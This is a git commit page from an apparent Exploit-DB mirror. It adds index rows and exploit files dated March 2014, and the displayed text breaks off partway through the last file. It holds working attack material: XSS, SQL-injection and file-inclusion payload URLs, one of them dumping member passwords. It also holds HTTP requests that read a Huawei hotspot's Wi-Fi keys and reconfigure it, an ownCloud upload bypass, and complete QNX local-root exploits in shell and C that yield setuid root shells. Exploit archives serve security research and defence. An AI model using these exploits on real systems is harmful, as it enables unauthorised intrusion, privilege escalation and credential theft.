bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_12_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-12 04:28:49 +00:00
parent cf9a24defe
commit 356156bb8c
30 changed files with 1283 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
files.csv
View file

@ -28931,3 +28931,32 @@ id,file,description,date,author,platform,type,port
32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 'connector.php' Local File Include Vulnerability",2008-08-04,"Sina Yazdanmehr",php,webapps,0
32151,platforms/asp/webapps/32151.pl,"Pcshey Portal 'kategori.asp' SQL Injection Vulnerability",2008-08-04,U238,asp,webapps,0
32152,platforms/windows/local/32152.py,"KMPlayer 3.8.0.117 - Buffer Overflow",2014-03-10,metacom,windows,local,0
32153,platforms/qnx/local/32153.sh,"QNX 6.4.x/6.5.x ifwatchd - Local root Exploit",2014-03-10,cenobyte,qnx,local,0
32154,platforms/qnx/local/32154.c,"QNX 6.5.0 x86 io-graphics - Local root Exploit",2014-03-10,cenobyte,qnx,local,0
32155,platforms/qnx/local/32155.c,"QNX 6.5.0 x86 phfont - Local root Exploit",2014-03-10,cenobyte,qnx,local,0
32156,platforms/qnx/local/32156.txt,"QNX 6.4.x/6.5.x pppoectl - Information Disclosure",2014-03-10,cenobyte,qnx,local,0
32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80
32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0
32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80
32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x, 4.5.x (upload.php, filename param) - Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80
32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,metasploit,windows,remote,30000
32164,platforms/windows/remote/32164.rb,"HP Data Protector Backup Client Service Remote Code Execution",2014-03-10,metasploit,windows,remote,5555
32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0
32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 iart.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0
32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 Host Header Internet Filter Security Bypass Vulnerability",2008-08-05,nnposter,multiple,remote,0
32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0
32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 'livehelp_js.php' Cross-Site Scripting Vulnerability",2008-08-05,CoRSaNTuRK,php,webapps,0
32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery index.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery images.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32172,platforms/php/webapps/32172.txt,"Softbiz Image Gallery suggest_image.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32173,platforms/php/webapps/32173.txt,"Softbiz Image Gallery image_desc.php latest Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32174,platforms/php/webapps/32174.txt,"Softbiz Image Gallery adminhome.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32175,platforms/php/webapps/32175.txt,"Softbiz Image Gallery config.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32176,platforms/php/webapps/32176.txt,"Softbiz Image Gallery changepassword.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32177,platforms/php/webapps/32177.txt,"Softbiz Image Gallery cleanup.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery browsecats.php msg Parameter XSS",2008-08-05,sl4xUz,php,webapps,0
32179,platforms/php/webapps/32179.txt,"POWERGAP Shopsystem 's03.php' SQL Injection Vulnerability",2008-08-05,"Rohit Bansal",php,webapps,0
32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 'index.php' Multiple Local File Include Vulnerabilities",2008-08-06,casper41,php,webapps,0
32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,IRCRASH,php,webapps,0
32182,platforms/php/webapps/32182.txt,"phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0
32183,platforms/php/webapps/32183.txt,"phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0

Can't render this file because it is too large.

20
platforms/asp/webapps/32157.txt Executable file
View file

@ -0,0 +1,20 @@
# Exploit Title: Kentico CMS User Enumeration Bug
# Google Dork: inurl:/CMSPages/logon.aspx <-- enumerates several Kentico
CMS sites
# Date: 02-25-2014
# Exploit Author: Charlie Campbell and Lyndon Mendoza
# Vendor Homepage: http://www.kentico.com/
# Software Link: http://www.kentico.com/Download-Demo/Trial-Version
# Version: [Version 7.0.75 and previous versions]
This vulnerability is an unprotected page on the site where you can view
all current users and usernames.
To find out if a Kentico CMS is vulnerable go to
http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx
assuming that the Kentico CMS was installed to the root folder in the
server.
I have already notified the authors and security team for Kentico CMS, in
their response they claimed they would issue a patch on 02-21-2014.

180
platforms/hardware/webapps/32161.txt Executable file
View file

@ -0,0 +1,180 @@
SEC Consult Vulnerability Lab Security Advisory < 20140307-0 >
=======================================================================
title: Unauthenticated access & manipulation of settings
product: Huawei E5331 MiFi mobile hotspot
vulnerable version: Software version 21.344.11.00.414
fixed version: Software version 21.344.27.00.414
impact: High
homepage: http://www.huawei.com
found: 2013-12-06
by: J. Greil
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Huawei E5331 Mobile WiFi is a high-speed packet access mobile hotspot. It is a
multi-mode wireless terminal for SOHO (Small Office and Home Office) and
business professionals.
You can connect the E5331 with the USB interface of a computer, or connect the
E5331 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM
network, you can surf the Internet and send/receive messages/emails
cordlessly. The E5331 is fast, reliable, and easy to operate. Thus, mobile
users can experience many new features and services with the E5331. These
features and services will enable a large number of users to use the E5331 and
the average revenue per user (ARPU) of operators will increase substantially."
source:
http://www.huaweidevice.com/worldwide/productFeatures.do?pinfoId=3272&directoryId=5009&treeId=3619&tab=0
Business recommendation:
------------------------
All discovered vulnerabilities can be exploited without authentication and
therefore pose a high security risk.
The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the device. It is assumed that further
vulnerabilities exist within this product!
The recommendation of SEC Consult is to perform follow-up security tests of
this device and similar devices.
Vulnerability overview/description:
-----------------------------------
Unauhenticated attackers are able to gain access to sensitive configuration
(e.g. WLAN passwords in clear text or IMEI information of the SIM card) and
even manipulate all settings in the web administration interface! This also
works when the "Enable firewall" feature is set in "Firewall Switch" settings
of the web interface.
This can even be exploited remotely via Internet depending on the mobile
operator setup. E.g. if the operator allows incoming connections for mobile
networks, the web interface would be accessible and exploitable publicly.
Otherwise those settings can be manipulated via CSRF attacks too. The DNS name
"mobilewifi.home" can be used regardless of the IP address settings.
Proof of concept:
-----------------
An attacker simply needs to access certain URLs of the web interface in order
to receive the configuration. No authentication is needed!
URL for retrieving wireless passwords / PSK in clear text:
http://mobilewifi.home/api/wlan/security-settings
XML response:
<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>NONE</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>AES</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>XXXXX</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>
Further interesting URLs to retrieve information from (not complete):
http://mobilewifi.home/api/wlan/wps (WPS pin)
http://mobilewifi.home/api/security/dmz (DMZ host settings)
http://mobilewifi.home/api/pin/simlock (enable SIM lock)
http://mobilewifi.home/api/wlan/host-list (connected wireless clients)
http://mobilewifi.home/api/device/information (IMEI, MAC, etc)
[...]
In order to change settings it is also simply possible to issue POST requests
to the specific URLs. E.g. change the "DMZ Settings" in order to make internal
clients (client IP addresses can be retrieved through the host-list from above)
reachable from the outside:
POST /api/security/dmz HTTP/1.1
Host: mobilewifi.home
<?xml version="1.0"
encoding="UTF-8"?><request><DmzStatus>1</DmzStatus><DmzIPAddress>A.B.C.D</DmzIPAddress></request>
All those requests can either be issued via CSRF or also from the Internet, if
the web interface of the device is reachable (depends on the mobile operator
settings).
Vulnerable / tested versions:
-----------------------------
The following version of the device has been tested which was the latest
version available at the time of identification of the flaw (the automatic
update feature did not supply any new version):
Software version: 21.344.11.00.414
Web UI version: 11.001.07.00.03
Vendor contact timeline:
------------------------
2013-12-11: Contacting vendor through psirt@huawei.com
2013-12-12: Reply from vendor
2013-12-18: Vendor requests some further details, sending answer
2014-01-09: Vendor: problem will be resolved in new firmware version
2014-01-14: Patch is planned for 6th March 2014
2014-03-07: SEC Consult releases coordinated security advisory
Solution:
---------
According to the vendor the following firmware release fixes the identified
problems:
* Software version 21.344.27.00.414
It contains the following improvements according to the vendor:
1. Users cannot obtain or set any device parameter without logging in.
2. Added server-side authentication to discard illegitimate packets.
The firmware can be downloaded from here:
http://consumer.huawei.com/en/support/downloads/index.htm
The item is called: E5331Update_21.344.27.00.414.B757
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
EOF J. Greil / @2014

9
platforms/linux/remote/32165.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30535/info
XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
XAMPP 1.6.7 for Linux is vulnerable; other versions may also be affected.
http://www.example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script>

9
platforms/linux/remote/32166.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30535/info
XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
XAMPP 1.6.7 for Linux is vulnerable; other versions may also be affected.
http://www.example.com/xampp/iart.php?text=">><<>>"''<script>alert(document.alert)</script>

17
platforms/multiple/remote/32167.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/30541/info
8e6 Technologies R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block. This could aid in further attacks.
R3000 Internet Filter 2.0.12.10 is vulnerable; other versions may also be affected.
The following example requests are available:
GET / HTTP/1.0
X-DecoyHost: www.allowed.org
Host: www.blocked.org
GET / HTTP/1.0
X-Decoy: Host: www.allowed.org
Host: www.blocked.org

70
platforms/multiple/webapps/32162.txt Executable file
View file

@ -0,0 +1,70 @@
Vulnerability title: Remote Code Execution in ownCloud
CVE: CVE-2014-2044
Vendor: ownCloud
Product: ownCloud
Affected version: 4.0.x & 4.5.x
Fixed version: 5.0
Reported by: Alejo Murillo Moya
Details:
A remote code execution has been found and confirmed within ownCloud as
an authenticated user. A successful attack could allow an authenticated
attacker to execute PHP code, which could lead to a full compromise of
the server and associated infrastructure. Please note that only the
Windows versions of ownCloud are affected and that valid credentials are
required.
It is possible to create a custom .htaccess into the user's folder on
Windows version of the application, which will enable PHP execution on
the folder. This vulnerability exists because it is possible to bypass
the internal blacklists using Windows ADS (Alternate Data Streams).
Proof Of Concept:
POST /owncloud_5.0.14a/owncloud/?app=files&getfile=ajax%2Fupload.php HTTP/1.1
[...]
Content-Type: multipart/form-data; boundary=---------------------------21191376031994875607185408411
Requesttoken: None
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="MAX_FILE_SIZE"
536870912
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="requesttoken"
None
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="dir"
/
-----------------------------21191376031994875607185408411
Content-Disposition: form-data; name="files[]"; filename=".htaccess::$DATA"
Content-Type: text/plain
<PUT YOUR TEXT HERE>
-----------------------------21191376031994875607185408411--
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

22
platforms/php/webapps/32168.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/30542/info
Pluck is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pluck 4.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/data/inc/footer.php?lang_footer=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?pluck_version=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_install22=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?titelkop=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop1=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop2=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_modules=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop4=[Cross Site Scripting]
http://www.example.com/pluck/data/inc/header.php?lang_kop15=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?lang_kop5=[Cross Site Scripting]
http://www.example.com/data/inc/header.php?titelkop=[Cross Site Scripting]
http://www.example.com/data/inc/header2.php?pluck_version=[Cross Site Scripting]
http://www.example.com/data/inc/header2.php?titelkop=[Cross Site Scripting]
http://www.example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting]

7
platforms/php/webapps/32169.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30543/info
Crafty Syntax Live Help (CSLH) is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/help/livehelp_js.php?department=<script>alert(1)</script>

8
platforms/php/webapps/32170.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?latest=[XSS]
http://www.example.com/index.php?msg=[XSS]

8
platforms/php/webapps/32171.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/images.php?latest=[XSS]
http://www.example.com/images.php?msg=[XSS]

8
platforms/php/webapps/32172.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/suggest_image.php?latest=[XSS]
http://www.example.com/suggest_image.php?msg=[XSS]

8
platforms/php/webapps/32173.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/image_desc.php?latest=[XSS]
http://www.example.com/image_desc.php?msg=[XSS]

7
platforms/php/webapps/32174.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/adminhome.php?msg=[XSS]

7
platforms/php/webapps/32175.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/config.php?msg=[XSS]

7
platforms/php/webapps/32176.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/changepassword.php?msg=[XSS]

7
platforms/php/webapps/32177.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/cleanup.php?msg=[XSS]

7
platforms/php/webapps/32178.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30546/info
Softbiz Photo Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/admin/browsecats.php?msg=[XSS]

7
platforms/php/webapps/32179.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30558/info
POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/s03.php?shopid=s03&cur=eur&sp=de&ag='[SQL]

10
platforms/php/webapps/32180.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/30564/info
The Contact module for Chupix CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Contact 0.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/index.php?module=[LFI]
http://www.example.com/path/admin/index.php?module=[LFI]

11
platforms/php/webapps/32181.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/30565/info
Battle.net Clan Script is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Battle.net Clan Script 1.5.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*
http://www.example.com/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*

9
platforms/php/webapps/32182.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30566/info
phpKF-Portal is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
phpKF-Portal 1.10 is vulnerable; other versions may also be affected.
http://www.example.com/path/baslik.php?tema_dizin=../%00LocalFile]

9
platforms/php/webapps/32183.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30566/info
phpKF-Portal is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
phpKF-Portal 1.10 is vulnerable; other versions may also be affected.
http://www.example.com/path/anket_yonetim.php?portal_ayarlarportal_dili=../%00LocalFile]

65
platforms/qnx/local/32153.sh Executable file
View file

@ -0,0 +1,65 @@
#!/bin/sh
#
# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# Setuid root ifwatchd watches for addresses added to or deleted from network
# interfaces and calls up/down scripts for them. Any user can launch ifwatchd
# and provide arbitrary up/down scripts. Unfortunately ifwatchd does not drop
# privileges when executing user supplied scripts.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
#
# - exploit description:
# This exploit creates a fake arrival-script which will be executed as root by
# passing it to the -A parameter of /sbin/ifwatchd. The fake arrival-script
# copies /bin/sh to /tmp/shell and makes it setuid root. Once the setuid shell
# is in place ifwatchd will be killed to drop the user into the root shell.
#
# - example:
# $ uname -a
# QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
# $ id
# uid=100(user) gid=100
# $ ./qnx-ifwatchd.sh
# QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013
#
# [-] creating fake arrival-script
# [-] executing ifwatchd, please wait
# Killed
# [-] now executing suid shell
# # id
# uid=100(user) gid=100 euid=0(root)
PATH=/bin:/usr/bin:/sbin
if [ ! -x /sbin/ifwatchd ]; then
echo "error: cannot execute /sbin/ifwatchd"
exit 1
fi
echo "QNX 6.4.x/6.5.x ifwatchd local root exploit by cenobyte 2013"
echo
echo "[-] creating fake arrival-script"
cat << _EOF_ > /tmp/0
#!/bin/sh
PATH=/bin:/usr/bin
IFWPID=\$(ps -edaf | grep "ifwatchd -A" | awk '!/grep/ { print \$2 }')
cp /bin/sh /tmp/shell
chown root:root /tmp/shell
chmod 4755 /tmp/shell
rm -f /tmp/0
kill -9 \$IFWPID
exit 0
_EOF_
chmod +x /tmp/0
echo "[-] executing ifwatchd, please wait"
ifwatchd -A /tmp/0 -v lo0 2>&1 >/dev/null
echo "[-] now executing suid shell"
/tmp/shell

143
platforms/qnx/local/32154.c Executable file
View file

@ -0,0 +1,143 @@
/*
* QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013
* <vincitamorpatriae@gmail.com>
*
* - vulnerability description:
* Setuid root /usr/photon/bin/io-graphics on QNX is prone to a buffer overflow.
* The vulnerability is due to insufficent bounds checking of the PHOTON2_HOME
* environment variable.
*
* - vulnerable platforms:
* QNX 6.5.0SP1
* QNX 6.5.0
* QNX 6.4.1
*
* - not vulnerable:
* QNX 6.3.0
*
* - exploit information:
* This is a return-to-libc exploit that yields euid=0. The addresses of
* system() and exit() are retrieved from libc using dlsym().
*
* The address of /bin/sh is retrieved by searching from address 0xb0300000.
*
* - example:
* $ uname -a
* QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
* $ id
* uid=100(user) gid=100
* $ ./qnx-io-graphics
* QNX io-graphics 6.5.0 x86 local root exploit by cenobyte 2013
* [-] system(): 0xb031bd80
* [-] exit(): 0xb032b5f0
* [-] /bin/sh: 0xb0374412
* # id
* uid=100(user) gid=100 euid=0(root)
*
*/
#include <dlfcn.h>
#include <err.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define VULN "PHOTON2_PATH="
static void fail(void);
static void checknull(unsigned int addr);
static unsigned int find_string(char *s);
static unsigned int find_libc(char *syscall);
void
checknull(unsigned int addr)
{
if (!(addr & 0xff) || \
!(addr & 0xff00) || \
!(addr & 0xff0000) || \
!(addr & 0xff000000))
errx(1, "return-to-libc failed: " \
"0x%x contains a null byte", addr);
}
void
fail(void)
{
printf("\n");
errx(1, "return-to-libc failed");
}
unsigned int
find_string(char *string)
{
unsigned int i;
char *a;
printf("[-] %s: ", string);
signal(SIGSEGV, fail);
for (i = 0xb0300000; i < 0xdeadbeef; i++) {
a = i;
if (strcmp(a, string) != 0)
continue;
printf("0x%x\n", i);
checknull(i);
return(i);
}
return(1);
}
unsigned int
find_libc(char *syscall)
{
void *s;
unsigned int syscall_addr;
if (!(s = dlopen(NULL, RTLD_LAZY)))
errx(1, "error: dlopen() failed");
if (!(syscall_addr = (unsigned int)dlsym(s, syscall)))
errx(1, "error: dlsym() %s", syscall);
printf("[-] %s(): 0x%x\n", syscall, syscall_addr);
checknull(syscall_addr);
return(syscall_addr);
return(1);
}
int
main()
{
unsigned int offset = 429;
unsigned int system_addr;
unsigned int exit_addr;
unsigned int binsh_addr;
char env[440];
char *prog[] = { "/usr/photon/bin/io-graphics", "io-graphics", NULL };
char *envp[] = { env, NULL };
printf("QNX 6.5.0 x86 io-graphics local root exploit by cenobyte 2013\n\n");
system_addr = find_libc("system");
exit_addr = find_libc("exit");
binsh_addr = find_string("/bin/sh");
memset(env, 0xEB, sizeof(env));
memcpy(env, VULN, strlen(VULN));
memcpy(env + offset, (char *)&system_addr, 4);
memcpy(env + offset + 4, (char *)&exit_addr, 4);
memcpy(env + offset + 8, (char *)&binsh_addr, 4);
execve(prog[0], prog, envp);
return(0);
}

193
platforms/qnx/local/32155.c Executable file
View file

@ -0,0 +1,193 @@
/*
* QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013
* <vincitamorpatriae@gmail.com>
*
* - vulnerability description:
* Setuid root /usr/photon/bin/phfont on QNX is prone to a buffer overflow.
* The vulnerability is due to insufficent bounds checking of the PHOTON_HOME
* environment variable.
*
* - vulnerable platforms:
* QNX 6.5.0SP1
* QNX 6.5.0
* QNX 6.4.1
*
* - not vulnerable:
* QNX 6.3.0
* QNX 6.2.0
*
* - exploit information:
* This is a return-to-libc exploit that yields euid=0. The addresses of
* system() and exit() are retrieved from libc using dlsym().
*
* During development of this exploit I ran into tty issues after succesfully
* overwriting the EIP and launching /bin/sh. The following message appeared:
*
* No controlling tty (open /dev/tty: No such device or address)
*
* The shell became unusable and required a kill -9 to exit. To get around that
* I had modify the exploit to create a shell script named /tmp/sh which copies
* /bin/sh to /tmp/shell and then performs a chmod +s on /tmp/shell.
*
* During execution of the exploit the argument of system() will be set to sh,
* and PATH will be set to /tmp. Once /tmp/sh is been executed, the exploit
* will launch the setuid /tmp/shell yielding the user euid=0.
*
* - example:
* $ uname -a
* QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86
* $ id
* uid=100(user) gid=100
* $ ./qnx-phfont
* QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013
*
* [-] system(): 0xb031bd80
* [-] exit(): 0xb032b5f0
* [-] sh: 0xb030b7f8
* [-] now dropping into root shell...
* # id
* uid=100(user) gid=100 euid=0(root)
*
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <dlfcn.h>
#include <err.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define HEADER "QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013"
